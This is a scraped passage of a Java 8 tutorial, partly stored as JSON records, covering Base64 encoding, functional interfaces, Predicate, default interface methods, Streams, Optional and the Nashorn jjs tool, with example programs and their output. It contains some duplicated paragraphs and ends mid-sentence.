C:\JAVA>java Java8Tester It should produce the following output − Base64 Encoded String (Basic) :VHV0b3JpYWxzUG9pbnQ/amF2YTg= Original String: TutorialsPoint?java8 Base64 Encoded String (URL) :VHV0b3JpYWxzUG9pbnQ_amF2YTg= Base64 Encoded String (MIME) :YmU3NWY2ODktNGM5YS00ODlmLWI2MTUtZTVkOTk2YzQ1Njk1Y2EwZTg2OTEtMmRiZC00YTQ1LWJl NTctMTI1MWUwMTk0ZWQyNDE0NDAwYjgtYTYxOS00NDY5LTllYTctNjc1YzE3YWJhZTk1MTQ2MDQz NDItOTAyOC00ZWI0LThlOTYtZWU5YzcwNWQyYzVhMTQxMWRjYTMtY2MwNi00MzU0LTg0MTgtNGQ1 
MDkwYjdiMzg2ZTY0OWU5MmUtZmNkYS00YWEwLTg0MjQtYThiOTQxNDQ2YzhhNTVhYWExZjItNjU2 Mi00YmM4LTk2ZGYtMDE4YmY5ZDZhMjkwMzM3MWUzNDMtMmQ3MS00MDczLWI0Y2UtMTQxODE0MGU5 YjdmYTVlODUxYzItN2NmOS00N2UyLWIyODQtMThlMWVkYTY4M2Q1YjE3YTMyYmItZjllMS00MTFk LWJiM2UtM2JhYzUxYzI5OWI4
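The matching decoders are used in the same way as the encoders shown above. The following short sketch (illustrative only; it reuses the URL-safe string from the output above and assumes UTF-8 text) shows how the URL and MIME decoders recover the original string:

import java.util.Base64;
import java.io.UnsupportedEncodingException;

public class Base64DecodeSketch {

   public static void main(String args[]) {
      try {
         //decode the URL-safe string produced above back to the original text
         byte[] urlDecodedBytes = Base64.getUrlDecoder().decode("VHV0b3JpYWxzUG9pbnQ_amF2YTg=");
         System.out.println("Decoded (URL) : " + new String(urlDecodedBytes, "utf-8"));

         //the MIME decoder ignores the '\r\n' line separators inserted by the MIME encoder
         String mimeEncoded = Base64.getMimeEncoder().encodeToString("TutorialsPoint?java8".getBytes("utf-8"));
         byte[] mimeDecodedBytes = Base64.getMimeDecoder().decode(mimeEncoded);
         System.out.println("Decoded (MIME) : " + new String(mimeDecodedBytes, "utf-8"));
      } catch(UnsupportedEncodingException e) {
         System.out.println("Error :" + e.getMessage());
      }
   }
}

Both lines print the original string, TutorialsPoint?java8.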
}, { "code": null, "e": 17247, "s": 17234, "text": "LongSupplier" }, { "code": null, "e": 17293, "s": 17247, "text": "Represents a supplier of long-valued results." }, { "code": null, "e": 17314, "s": 17293, "text": "LongToDoubleFunction" }, { "code": null, "e": 17409, "s": 17314, "text": "Represents a function that accepts a long-valued argument and produces a double-valued result." }, { "code": null, "e": 17427, "s": 17409, "text": "LongToIntFunction" }, { "code": null, "e": 17520, "s": 17427, "text": "Represents a function that accepts a long-valued argument and produces an int-valued result." }, { "code": null, "e": 17538, "s": 17520, "text": "LongUnaryOperator" }, { "code": null, "e": 17630, "s": 17538, "text": "Represents an operation on a single long-valued operand that produces a long-valued result." }, { "code": null, "e": 17651, "s": 17630, "text": "ObjDoubleConsumer<T>" }, { "code": null, "e": 17758, "s": 17651, "text": "Represents an operation that accepts an object-valued and a double-valued argument, and returns no result." }, { "code": null, "e": 17776, "s": 17758, "text": "ObjIntConsumer<T>" }, { "code": null, "e": 17881, "s": 17776, "text": "Represents an operation that accepts an object-valued and an int-valued argument, and returns no result." }, { "code": null, "e": 17900, "s": 17881, "text": "ObjLongConsumer<T>" }, { "code": null, "e": 18005, "s": 17900, "text": "Represents an operation that accepts an object-valued and a long-valued argument, and returns no result." }, { "code": null, "e": 18018, "s": 18005, "text": "Predicate<T>" }, { "code": null, "e": 18084, "s": 18018, "text": "Represents a predicate (Boolean-valued function) of one argument." }, { "code": null, "e": 18096, "s": 18084, "text": "Supplier<T>" }, { "code": null, "e": 18130, "s": 18096, "text": "Represents a supplier of results." }, { "code": null, "e": 18154, "s": 18130, "text": "ToDoubleBiFunction<T,U>" }, { "code": null, "e": 18240, "s": 18154, "text": "Represents a function that accepts two arguments and produces a double-valued result." }, { "code": null, "e": 18260, "s": 18240, "text": "ToDoubleFunction<T>" }, { "code": null, "e": 18320, "s": 18260, "text": "Represents a function that produces a double-valued result." }, { "code": null, "e": 18341, "s": 18320, "text": "ToIntBiFunction<T,U>" }, { "code": null, "e": 18425, "s": 18341, "text": "Represents a function that accepts two arguments and produces an int-valued result." }, { "code": null, "e": 18442, "s": 18425, "text": "ToIntFunction<T>" }, { "code": null, "e": 18500, "s": 18442, "text": "Represents a function that produces an int-valued result." }, { "code": null, "e": 18522, "s": 18500, "text": "ToLongBiFunction<T,U>" }, { "code": null, "e": 18606, "s": 18522, "text": "Represents a function that accepts two arguments and produces a long-valued result." }, { "code": null, "e": 18624, "s": 18606, "text": "ToLongFunction<T>" }, { "code": null, "e": 18682, "s": 18624, "text": "Represents a function that produces a long-valued result." }, { "code": null, "e": 18699, "s": 18682, "text": "UnaryOperator<T>" }, { "code": null, "e": 18799, "s": 18699, "text": "Represents an operation on a single operand that produces a result of the same type as its operand." }, { "code": null, "e": 18974, "s": 18799, "text": "Predicate <T> interface is a functional interface with a method test(Object) to return a Boolean value. This interface signifies that an object is tested to be true or false." 
}, { "code": null, "e": 19060, "s": 18974, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 20369, "s": 19060, "text": "import java.util.Arrays;\nimport java.util.List;\nimport java.util.function.Predicate;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n List<Integer> list = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9);\n\t\t\n // Predicate<Integer> predicate = n -> true\n // n is passed as parameter to test method of Predicate interface\n // test method will always return true no matter what value n has.\n\t\t\n System.out.println(\"Print all numbers:\");\n\t\t\n //pass n as parameter\n eval(list, n->true);\n\t\t\n // Predicate<Integer> predicate1 = n -> n%2 == 0\n // n is passed as parameter to test method of Predicate interface\n // test method will return true if n%2 comes to be zero\n\t\t\n System.out.println(\"Print even numbers:\");\n eval(list, n-> n%2 == 0 );\n\t\t\n // Predicate<Integer> predicate2 = n -> n > 3\n // n is passed as parameter to test method of Predicate interface\n // test method will return true if n is greater than 3.\n\t\t\n System.out.println(\"Print numbers greater than 3:\");\n eval(list, n-> n > 3 );\n }\n\t\n public static void eval(List<Integer> list, Predicate<Integer> predicate) {\n\n for(Integer n: list) {\n\n if(predicate.test(n)) {\n System.out.println(n + \" \");\n }\n }\n }\n}" }, { "code": null, "e": 20456, "s": 20369, "text": "Here we've passed Predicate interface, which takes a single input and returns Boolean." }, { "code": null, "e": 20508, "s": 20456, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 20540, "s": 20508, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 20577, "s": 20540, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 20603, "s": 20577, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 20644, "s": 20603, "text": "It should produce the following output −" }, { "code": null, "e": 20752, "s": 20644, "text": "Print all numbers:\n1\n2\n3\n4\n5\n6\n7\n8\n9\nPrint even numbers:\n2\n4\n6\n8\nPrint numbers greater than 3:\n4\n5\n6\n7\n8\n9\n" }, { "code": null, "e": 20975, "s": 20752, "text": "Java 8 introduces a new concept of default method implementation in interfaces. This capability is added for backward compatibility so that old interfaces can be used to leverage the lambda expression capability of Java 8." }, { "code": null, "e": 21342, "s": 20975, "text": "For example, ‘List’ or ‘Collection’ interfaces do not have ‘forEach’ method declaration. Thus, adding such method will simply break the collection framework implementations. Java 8 introduces default method so that List/Collection interface can have a default implementation of forEach method, and the class implementing these interfaces need not implement the same." }, { "code": null, "e": 21449, "s": 21342, "text": "public interface vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n}\n" }, { "code": null, "e": 21645, "s": 21449, "text": "With default functions in interfaces, there is a possibility that a class is implementing two interfaces with same default methods. The following code explains how this ambiguity can be resolved." 
}, { "code": null, "e": 21867, "s": 21645, "text": "public interface vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n}\n\npublic interface fourWheeler {\n\n default void print() {\n System.out.println(\"I am a four wheeler!\");\n }\n}" }, { "code": null, "e": 21952, "s": 21867, "text": "First solution is to create an own method that overrides the default implementation." }, { "code": null, "e": 22098, "s": 21952, "text": "public class car implements vehicle, fourWheeler {\n\n public void print() {\n System.out.println(\"I am a four wheeler car vehicle!\");\n }\n}" }, { "code": null, "e": 22184, "s": 22098, "text": "Second solution is to call the default method of the specified interface using super." }, { "code": null, "e": 22297, "s": 22184, "text": "public class car implements vehicle, fourWheeler {\n\n public void print() {\n vehicle.super.print();\n }\n}" }, { "code": null, "e": 22367, "s": 22297, "text": "An interface can also have static helper methods from Java 8 onwards." }, { "code": null, "e": 22553, "s": 22367, "text": "public interface vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n\t\n static void blowHorn() {\n System.out.println(\"Blowing horn!!!\");\n }\n}" }, { "code": null, "e": 22639, "s": 22553, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 23272, "s": 22639, "text": "public class Java8Tester {\n\n public static void main(String args[]) {\n Vehicle vehicle = new Car();\n vehicle.print();\n }\n}\n\ninterface Vehicle {\n\n default void print() {\n System.out.println(\"I am a vehicle!\");\n }\n\t\n static void blowHorn() {\n System.out.println(\"Blowing horn!!!\");\n }\n}\n\ninterface FourWheeler {\n\n default void print() {\n System.out.println(\"I am a four wheeler!\");\n }\n}\n\nclass Car implements Vehicle, FourWheeler {\n\n public void print() {\n Vehicle.super.print();\n FourWheeler.super.print();\n Vehicle.blowHorn();\n System.out.println(\"I am a car!\");\n }\n}" }, { "code": null, "e": 23324, "s": 23272, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 23356, "s": 23324, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 23393, "s": 23356, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 23419, "s": 23393, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 23460, "s": 23419, "text": "It should produce the following output −" }, { "code": null, "e": 23526, "s": 23460, "text": "I am a vehicle!\nI am a four wheeler!\nBlowing horn!!!\nI am a car!\n" }, { "code": null, "e": 23713, "s": 23526, "text": "Stream is a new abstract layer introduced in Java 8. Using stream, you can process data in a declarative way similar to SQL statements. For example, consider the following SQL statement." }, { "code": null, "e": 23774, "s": 23713, "text": "SELECT max(salary), employee_id, employee_name FROM Employee" }, { "code": null, "e": 24174, "s": 23774, "text": "The above SQL expression automatically returns the maximum salaried employee's details, without doing any computation on the developer's end. Using collections framework in Java, a developer has to use loops and make repeated checks. Another concern is efficiency; as multi-core processors are available at ease, a Java developer has to write parallel code processing that can be pretty error-prone." 
}, { "code": null, "e": 24380, "s": 24174, "text": "To resolve such issues, Java 8 introduced the concept of stream that lets the developer to process data declaratively and leverage multicore architecture without the need to write any specific code for it." }, { "code": null, "e": 24520, "s": 24380, "text": "Stream represents a sequence of objects from a source, which supports aggregate operations. Following are the characteristics of a Stream −" }, { "code": null, "e": 24693, "s": 24520, "text": "Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements." }, { "code": null, "e": 24866, "s": 24693, "text": "Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements." }, { "code": null, "e": 24943, "s": 24866, "text": "Source − Stream takes Collections, Arrays, or I/O resources as input source." }, { "code": null, "e": 25020, "s": 24943, "text": "Source − Stream takes Collections, Arrays, or I/O resources as input source." }, { "code": null, "e": 25137, "s": 25020, "text": "Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on." }, { "code": null, "e": 25254, "s": 25137, "text": "Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on." }, { "code": null, "e": 25630, "s": 25254, "text": "Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream." }, { "code": null, "e": 26006, "s": 25630, "text": "Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream." }, { "code": null, "e": 26176, "s": 26006, "text": "Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required." }, { "code": null, "e": 26346, "s": 26176, "text": "Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required." }, { "code": null, "e": 26418, "s": 26346, "text": "With Java 8, Collection interface has two methods to generate a Stream." }, { "code": null, "e": 26495, "s": 26418, "text": "stream() − Returns a sequential stream considering collection as its source." }, { "code": null, "e": 26572, "s": 26495, "text": "stream() − Returns a sequential stream considering collection as its source." }, { "code": null, "e": 26655, "s": 26572, "text": "parallelStream() − Returns a parallel Stream considering collection as its source." }, { "code": null, "e": 26738, "s": 26655, "text": "parallelStream() − Returns a parallel Stream considering collection as its source." 
}, { "code": null, "e": 26925, "s": 26738, "text": "List<String> strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\nList<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList());" }, { "code": null, "e": 27086, "s": 26925, "text": "Stream has provided a new method ‘forEach’ to iterate each element of the stream. The following code segment shows how to print 10 random numbers using forEach." }, { "code": null, "e": 27170, "s": 27086, "text": "Random random = new Random();\nrandom.ints().limit(10).forEach(System.out::println);" }, { "code": null, "e": 27315, "s": 27170, "text": "The ‘map’ method is used to map each element to its corresponding result. The following code segment prints unique squares of numbers using map." }, { "code": null, "e": 27506, "s": 27315, "text": "List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5);\n\n//get list of unique squares\nList<Integer> squaresList = numbers.stream().map( i -> i*i).distinct().collect(Collectors.toList());" }, { "code": null, "e": 27650, "s": 27506, "text": "The ‘filter’ method is used to eliminate elements based on a criteria. The following code segment prints a count of empty strings using filter." }, { "code": null, "e": 27831, "s": 27650, "text": "List<String>strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\n\n//get count of empty string\nint count = strings.stream().filter(string -> string.isEmpty()).count();" }, { "code": null, "e": 27969, "s": 27831, "text": "The ‘limit’ method is used to reduce the size of the stream. The following code segment shows how to print 10 random numbers using limit." }, { "code": null, "e": 28053, "s": 27969, "text": "Random random = new Random();\nrandom.ints().limit(10).forEach(System.out::println);" }, { "code": null, "e": 28184, "s": 28053, "text": "The ‘sorted’ method is used to sort the stream. The following code segment shows how to print 10 random numbers in a sorted order." }, { "code": null, "e": 28277, "s": 28184, "text": "Random random = new Random();\nrandom.ints().limit(10).sorted().forEach(System.out::println);" }, { "code": null, "e": 28447, "s": 28277, "text": "parallelStream is the alternative of stream for parallel processing. Take a look at the following code segment that prints a count of empty strings using parallelStream." }, { "code": null, "e": 28638, "s": 28447, "text": "List<String> strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\n\n//get count of empty string\nlong count = strings.parallelStream().filter(string -> string.isEmpty()).count();" }, { "code": null, "e": 28705, "s": 28638, "text": "It is very easy to switch between sequential and parallel streams." }, { "code": null, "e": 28843, "s": 28705, "text": "Collectors are used to combine the result of processing on the elements of a stream. Collectors can be used to return a list or a string." 
}, { "code": null, "e": 29244, "s": 28843, "text": "List<String>strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\nList<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList());\n\nSystem.out.println(\"Filtered List: \" + filtered);\nString mergedString = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.joining(\", \"));\nSystem.out.println(\"Merged String: \" + mergedString);" }, { "code": null, "e": 29360, "s": 29244, "text": "With Java 8, statistics collectors are introduced to calculate all statistics when stream processing is being done." }, { "code": null, "e": 29762, "s": 29360, "text": "List numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5);\n\nIntSummaryStatistics stats = numbers.stream().mapToInt((x) -> x).summaryStatistics();\n\nSystem.out.println(\"Highest number in List : \" + stats.getMax());\nSystem.out.println(\"Lowest number in List : \" + stats.getMin());\nSystem.out.println(\"Sum of all numbers : \" + stats.getSum());\nSystem.out.println(\"Average of all numbers : \" + stats.getAverage());" }, { "code": null, "e": 29848, "s": 29762, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." }, { "code": null, "e": 35861, "s": 29848, "text": "import java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.IntSummaryStatistics;\nimport java.util.List;\nimport java.util.Random;\nimport java.util.stream.Collectors;\nimport java.util.Map;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n System.out.println(\"Using Java 7: \");\n\t\t\n // Count empty strings\n List<String> strings = Arrays.asList(\"abc\", \"\", \"bc\", \"efg\", \"abcd\",\"\", \"jkl\");\n System.out.println(\"List: \" +strings);\n long count = getCountEmptyStringUsingJava7(strings);\n\t\t\n System.out.println(\"Empty Strings: \" + count);\n count = getCountLength3UsingJava7(strings);\n\t\t\n System.out.println(\"Strings of length 3: \" + count);\n\t\t\n //Eliminate empty string\n List<String> filtered = deleteEmptyStringsUsingJava7(strings);\n System.out.println(\"Filtered List: \" + filtered);\n\t\t\n //Eliminate empty string and join using comma.\n String mergedString = getMergedStringUsingJava7(strings,\", \");\n System.out.println(\"Merged String: \" + mergedString);\n List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5);\n\t\t\n //get list of square of distinct numbers\n List<Integer> squaresList = getSquares(numbers);\n System.out.println(\"Squares List: \" + squaresList);\n List<Integer> integers = Arrays.asList(1,2,13,4,15,6,17,8,19);\n\t\t\n System.out.println(\"List: \" +integers);\n System.out.println(\"Highest number in List : \" + getMax(integers));\n System.out.println(\"Lowest number in List : \" + getMin(integers));\n System.out.println(\"Sum of all numbers : \" + getSum(integers));\n System.out.println(\"Average of all numbers : \" + getAverage(integers));\n System.out.println(\"Random Numbers: \");\n\t\t\n //print ten random numbers\n Random random = new Random();\n\t\t\n for(int i = 0; i < 10; i++) {\n System.out.println(random.nextInt());\n }\n\t\t\n System.out.println(\"Using Java 8: \");\n System.out.println(\"List: \" +strings);\n\t\t\n count = strings.stream().filter(string->string.isEmpty()).count();\n System.out.println(\"Empty Strings: \" + count);\n\t\t\n count = strings.stream().filter(string -> string.length() == 3).count();\n System.out.println(\"Strings of length 3: \" + count);\n\t\t\n filtered = 
strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.toList());\n System.out.println(\"Filtered List: \" + filtered);\n\t\t\n mergedString = strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.joining(\", \"));\n System.out.println(\"Merged String: \" + mergedString);\n\t\t\n squaresList = numbers.stream().map( i ->i*i).distinct().collect(Collectors.toList());\n System.out.println(\"Squares List: \" + squaresList);\n System.out.println(\"List: \" +integers);\n\t\t\n IntSummaryStatistics stats = integers.stream().mapToInt((x) ->x).summaryStatistics();\n\t\t\n System.out.println(\"Highest number in List : \" + stats.getMax());\n System.out.println(\"Lowest number in List : \" + stats.getMin());\n System.out.println(\"Sum of all numbers : \" + stats.getSum());\n System.out.println(\"Average of all numbers : \" + stats.getAverage());\n System.out.println(\"Random Numbers: \");\n\t\t\n random.ints().limit(10).sorted().forEach(System.out::println);\n\t\t\n //parallel processing\n count = strings.parallelStream().filter(string -> string.isEmpty()).count();\n System.out.println(\"Empty Strings: \" + count);\n }\n\t\n private static int getCountEmptyStringUsingJava7(List<String> strings) {\n int count = 0;\n\n for(String string: strings) {\n\t\t\n if(string.isEmpty()) {\n count++;\n }\n }\n return count;\n }\n\t\n private static int getCountLength3UsingJava7(List<String> strings) {\n int count = 0;\n\t\t\n for(String string: strings) {\n\t\t\n if(string.length() == 3) {\n count++;\n }\n }\n return count;\n }\n\t\n private static List<String> deleteEmptyStringsUsingJava7(List<String> strings) {\n List<String> filteredList = new ArrayList<String>();\n\t\t\n for(String string: strings) {\n\t\t\n if(!string.isEmpty()) {\n filteredList.add(string);\n }\n }\n return filteredList;\n }\n\t\n private static String getMergedStringUsingJava7(List<String> strings, String separator) {\n StringBuilder stringBuilder = new StringBuilder();\n\t\t\n for(String string: strings) {\n\t\t\n if(!string.isEmpty()) {\n stringBuilder.append(string);\n stringBuilder.append(separator);\n }\n }\n String mergedString = stringBuilder.toString();\n return mergedString.substring(0, mergedString.length()-2);\n }\n\t\n private static List<Integer> getSquares(List<Integer> numbers) {\n List<Integer> squaresList = new ArrayList<Integer>();\n\t\t\n for(Integer number: numbers) {\n Integer square = new Integer(number.intValue() * number.intValue());\n\t\t\t\n if(!squaresList.contains(square)) {\n squaresList.add(square);\n }\n }\n return squaresList;\n }\n\t\n private static int getMax(List<Integer> numbers) {\n int max = numbers.get(0);\n\t\t\n for(int i = 1;i < numbers.size();i++) {\n\t\t\n Integer number = numbers.get(i);\n\t\t\t\n if(number.intValue() > max) {\n max = number.intValue();\n }\n }\n return max;\n }\n\t\n private static int getMin(List<Integer> numbers) {\n int min = numbers.get(0);\n\t\t\n for(int i= 1;i < numbers.size();i++) {\n Integer number = numbers.get(i);\n\t\t\n if(number.intValue() < min) {\n min = number.intValue();\n }\n }\n return min;\n }\n\t\n private static int getSum(List numbers) {\n int sum = (int)(numbers.get(0));\n\t\t\n for(int i = 1;i < numbers.size();i++) {\n sum += (int)numbers.get(i);\n }\n return sum;\n }\n\t\n private static int getAverage(List<Integer> numbers) {\n return getSum(numbers) / numbers.size();\n }\n}" }, { "code": null, "e": 35913, "s": 35861, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 35945, "s": 
35913, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 35982, "s": 35945, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 36008, "s": 35982, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 36049, "s": 36008, "text": "It should produce the following result −" }, { "code": null, "e": 37013, "s": 36049, "text": "Using Java 7:\nList: [abc, , bc, efg, abcd, , jkl]\nEmpty Strings: 2\nStrings of length 3: 3\nFiltered List: [abc, bc, efg, abcd, jkl]\nMerged String: abc, bc, efg, abcd, jkl\nSquares List: [9, 4, 49, 25]\nList: [1, 2, 13, 4, 15, 6, 17, 8, 19]\nHighest number in List : 19\nLowest number in List : 1\nSum of all numbers : 85\nAverage of all numbers : 9\nRandom Numbers:\n-1279735475\n903418352\n-1133928044\n-1571118911\n628530462\n18407523\n-881538250\n-718932165\n270259229\n421676854\nUsing Java 8:\nList: [abc, , bc, efg, abcd, , jkl]\nEmpty Strings: 2\nStrings of length 3: 3\nFiltered List: [abc, bc, efg, abcd, jkl]\nMerged String: abc, bc, efg, abcd, jkl\nSquares List: [9, 4, 49, 25]\nList: [1, 2, 13, 4, 15, 6, 17, 8, 19]\nHighest number in List : 19\nLowest number in List : 1\nSum of all numbers : 85\nAverage of all numbers : 9.444444444444445\nRandom Numbers:\n-1009474951\n-551240647\n-2484714\n181614550\n933444268\n1227850416\n1579250773\n1627454872\n1683033687\n1798939493\nEmpty Strings: 2\n" }, { "code": null, "e": 37353, "s": 37013, "text": "Optional is a container object used to contain not-null objects. Optional object is used to represent null with absent value. This class has various utility methods to facilitate code to handle values as ‘available’ or ‘not available’ instead of checking null values. It is introduced in Java 8 and is similar to what Optional is in Guava." }, { "code": null, "e": 37416, "s": 37353, "text": "Following is the declaration for java.util.Optional<T> class −" }, { "code": null, "e": 37463, "s": 37416, "text": "public final class Optional<T> extends Object\n" }, { "code": null, "e": 37494, "s": 37463, "text": "static <T> Optional<T> empty()" }, { "code": null, "e": 37530, "s": 37494, "text": "Returns an empty Optional instance." }, { "code": null, "e": 37557, "s": 37530, "text": "boolean equals(Object obj)" }, { "code": null, "e": 37622, "s": 37557, "text": "Indicates whether some other object is \"equal to\" this Optional." }, { "code": null, "e": 37674, "s": 37622, "text": "Optional<T> filter(Predicate<? super <T> predicate)" }, { "code": null, "e": 37819, "s": 37674, "text": "If a value is present and the value matches a given predicate, it returns an Optional describing the value, otherwise returns an empty Optional." }, { "code": null, "e": 37883, "s": 37819, "text": "<U> Optional<U> flatMap(Function<? super T,Optional<U>> mapper)" }, { "code": null, "e": 38029, "s": 37883, "text": "If a value is present, it applies the provided Optional-bearing mapping function to it, returns that result, otherwise returns an empty Optional." }, { "code": null, "e": 38037, "s": 38029, "text": "T get()" }, { "code": null, "e": 38137, "s": 38037, "text": "If a value is present in this Optional, returns the value, otherwise throws NoSuchElementException." }, { "code": null, "e": 38152, "s": 38137, "text": "int hashCode()" }, { "code": null, "e": 38246, "s": 38152, "text": "Returns the hash code value of the present value, if any, or 0 (zero) if no value is present." }, { "code": null, "e": 38291, "s": 38246, "text": "void ifPresent(Consumer<? 
super T> consumer)" }, { "code": null, "e": 38388, "s": 38291, "text": "If a value is present, it invokes the specified consumer with the value, otherwise does nothing." }, { "code": null, "e": 38408, "s": 38388, "text": "boolean isPresent()" }, { "code": null, "e": 38467, "s": 38408, "text": "Returns true if there is a value present, otherwise false." }, { "code": null, "e": 38526, "s": 38467, "text": "<U>Optional<U> map(Function<? super T,? extends U> mapper)" }, { "code": null, "e": 38668, "s": 38526, "text": "If a value is present, applies the provided mapping function to it, and if the result is non-null, returns an Optional describing the result." }, { "code": null, "e": 38703, "s": 38668, "text": "static <T> Optional<T> of(T value)" }, { "code": null, "e": 38766, "s": 38703, "text": "Returns an Optional with the specified present non-null value." }, { "code": null, "e": 38809, "s": 38766, "text": "static <T> Optional<T> ofNullable(T value)" }, { "code": null, "e": 38911, "s": 38809, "text": "Returns an Optional describing the specified value, if non-null, otherwise returns an empty Optional." }, { "code": null, "e": 38929, "s": 38911, "text": "T orElse(T other)" }, { "code": null, "e": 38984, "s": 38929, "text": "Returns the value if present, otherwise returns other." }, { "code": null, "e": 39025, "s": 38984, "text": "T orElseGet(Supplier<? extends T> other)" }, { "code": null, "e": 39122, "s": 39025, "text": "Returns the value if present, otherwise invokes other and returns the result of that invocation." }, { "code": null, "e": 39199, "s": 39122, "text": "<X extends Throwable> T orElseThrow(Supplier<? extends X> exceptionSupplier)" }, { "code": null, "e": 39310, "s": 39199, "text": "Returns the contained value, if present, otherwise throws an exception to be created by the provided supplier." }, { "code": null, "e": 39328, "s": 39310, "text": "String toString()" }, { "code": null, "e": 39411, "s": 39328, "text": "Returns a non-empty string representation of this Optional suitable for debugging." }, { "code": null, "e": 39466, "s": 39411, "text": "This class inherits methods from the following class −" }, { "code": null, "e": 39483, "s": 39466, "text": "java.lang.Object" }, { "code": null, "e": 39569, "s": 39483, "text": "Create the following Java program using any editor of your choice in, say, C:\\> JAVA." 
}, { "code": null, "e": 40676, "s": 39569, "text": "import java.util.Optional;\n\npublic class Java8Tester {\n\n public static void main(String args[]) {\n Java8Tester java8Tester = new Java8Tester();\n Integer value1 = null;\n Integer value2 = new Integer(10);\n\t\t\n //Optional.ofNullable - allows passed parameter to be null.\n Optional<Integer> a = Optional.ofNullable(value1);\n\t\t\n //Optional.of - throws NullPointerException if passed parameter is null\n Optional<Integer> b = Optional.of(value2);\n System.out.println(java8Tester.sum(a,b));\n }\n\t\n public Integer sum(Optional<Integer> a, Optional<Integer> b) {\n //Optional.isPresent - checks the value is present or not\n\t\t\n System.out.println(\"First parameter is present: \" + a.isPresent());\n System.out.println(\"Second parameter is present: \" + b.isPresent());\n\t\t\n //Optional.orElse - returns the value if present otherwise returns\n //the default value passed.\n Integer value1 = a.orElse(new Integer(0));\n\t\t\n //Optional.get - gets the value, value should be present\n Integer value2 = b.get();\n return value1 + value2;\n }\n}" }, { "code": null, "e": 40728, "s": 40676, "text": "Compile the class using javac compiler as follows −" }, { "code": null, "e": 40760, "s": 40728, "text": "C:\\JAVA>javac Java8Tester.java\n" }, { "code": null, "e": 40797, "s": 40760, "text": "Now run the Java8Tester as follows −" }, { "code": null, "e": 40823, "s": 40797, "text": "C:\\JAVA>java Java8Tester\n" }, { "code": null, "e": 40864, "s": 40823, "text": "It should produce the following output −" }, { "code": null, "e": 40936, "s": 40864, "text": "First parameter is present: false\nSecond parameter is present: true\n10\n" }, { "code": null, "e": 41247, "s": 40936, "text": "With Java 8, Nashorn, a much improved javascript engine is introduced, to replace the existing Rhino. Nashorn provides 2 to 10 times better performance, as it directly compiles the code in memory and passes the bytecode to JVM. Nashorn uses invoke dynamics feature, introduced in Java 7 to improve performance." }, { "code": null, "e": 41355, "s": 41247, "text": "For Nashorn engine, JAVA 8 introduces a new command line tool, jjs, to execute javascript codes at console." }, { "code": null, "e": 41411, "s": 41355, "text": "Create and save the file sample.js in c:\\> JAVA folder." }, { "code": null, "e": 41434, "s": 41411, "text": "print('Hello World!');" }, { "code": null, "e": 41478, "s": 41434, "text": "Open console and use the following command." }, { "code": null, "e": 41501, "s": 41478, "text": "C:\\JAVA>jjs sample.js\n" }, { "code": null, "e": 41539, "s": 41501, "text": "It will produce the following output:" }, { "code": null, "e": 41553, "s": 41539, "text": "Hello World!\n" }, { "code": null, "e": 41601, "s": 41553, "text": "Open the console and use the following command." }, { "code": null, "e": 41671, "s": 41601, "text": "C:\\JAVA>jjs\njjs> print(\"Hello, World!\")\nHello, World!\njjs> quit()\n>>\n" }, { "code": null, "e": 41719, "s": 41671, "text": "Open the console and use the following command." }, { "code": null, "e": 41810, "s": 41719, "text": "C:\\JAVA> jjs -- a b c\njjs> print('letters: ' +arguments.join(\", \"))\nletters: a, b, c\njjs>\n" }, { "code": null, "e": 41892, "s": 41810, "text": "Using ScriptEngineManager, JavaScript code can be called and interpreted in Java." }, { "code": null, "e": 41978, "s": 41892, "text": "Create the following 